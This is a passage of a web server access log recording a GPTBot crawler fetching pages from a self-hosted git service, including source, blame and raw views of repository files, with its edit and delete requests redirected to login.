"https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/templates/index.html" -[17/Feb/2026:17:03:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/templates/index.html" -[17/Feb/2026:17:03:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 9957] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:17:03:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 10169] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:17:03:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 91] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:17:03:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 11854] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old" -[17/Feb/2026:17:03:43 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" -[17/Feb/2026:17:03:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" -[17/Feb/2026:17:03:43 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" -[17/Feb/2026:17:03:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" -[17/Feb/2026:17:03:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/branch/main/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" [Client 74.7.227.38] [Length 13782] [Gzip 5.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" -[17/Feb/2026:17:03:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" [Client 74.7.227.38] [Length 10402] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" -[17/Feb/2026:17:03:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" [Client 74.7.227.38] [Length 2167] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" -[17/Feb/2026:17:03:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" [Client 74.7.227.38] [Length 1999] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" -[17/Feb/2026:17:03:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 11856] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old" -[17/Feb/2026:17:03:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/components/About.tsx" [Client 74.7.227.38] [Length 14204] [Gzip 4.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components" -[17/Feb/2026:17:03:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" [Client 74.7.227.38] [Length 11547] [Gzip 3.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles" -[17/Feb/2026:17:03:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.gitignore?display=source" [Client 74.7.227.38] [Length 11202] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.gitignore" -[17/Feb/2026:17:03:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 9987] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old_log_macros.hpp" -[17/Feb/2026:17:03:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 11371] [Gzip 4.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old_log_macros.hpp" -[17/Feb/2026:17:03:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 552] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old_log_macros.hpp" -[17/Feb/2026:17:03:49 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" -[17/Feb/2026:17:03:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" -[17/Feb/2026:17:03:50 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" -[17/Feb/2026:17:03:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" -[17/Feb/2026:17:03:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/index.tsx?display=source" [Client 74.7.227.38] [Length 11666] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/index.tsx" -[17/Feb/2026:17:03:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/static/js/app.js?display=rendered" [Client 74.7.227.38] [Length 11001] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/static/js/app.js" -[17/Feb/2026:17:03:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 9987] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old_log_macros.hpp" -[17/Feb/2026:17:03:52 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.Backup/html/components/About.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/About.tsx" -[17/Feb/2026:17:03:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.Backup/html/components/About.tsx" -[17/Feb/2026:17:03:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" [Client 74.7.227.38] [Length 10241] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:17:03:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 13183] [Gzip 4.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:17:03:54 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.Backup/html/components/About.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/About.tsx" -[17/Feb/2026:17:03:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.Backup/html/components/About.tsx" -[17/Feb/2026:17:03:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 12169] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:17:03:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 11325] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:17:03:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 11310] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:17:03:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 11284] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:17:03:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 11371] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:17:03:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 16055] [Gzip 5.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:17:03:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 11655] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:17:03:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 11733] [Gzip 3.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:17:03:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 11303] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:17:03:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 10009] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" -[17/Feb/2026:17:04:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 13920] [Gzip 8.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" -[17/Feb/2026:17:04:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 10018] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" -[17/Feb/2026:17:04:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 12080] [Gzip 5.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" -[17/Feb/2026:17:04:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 10299] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" -[17/Feb/2026:17:04:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 10242] 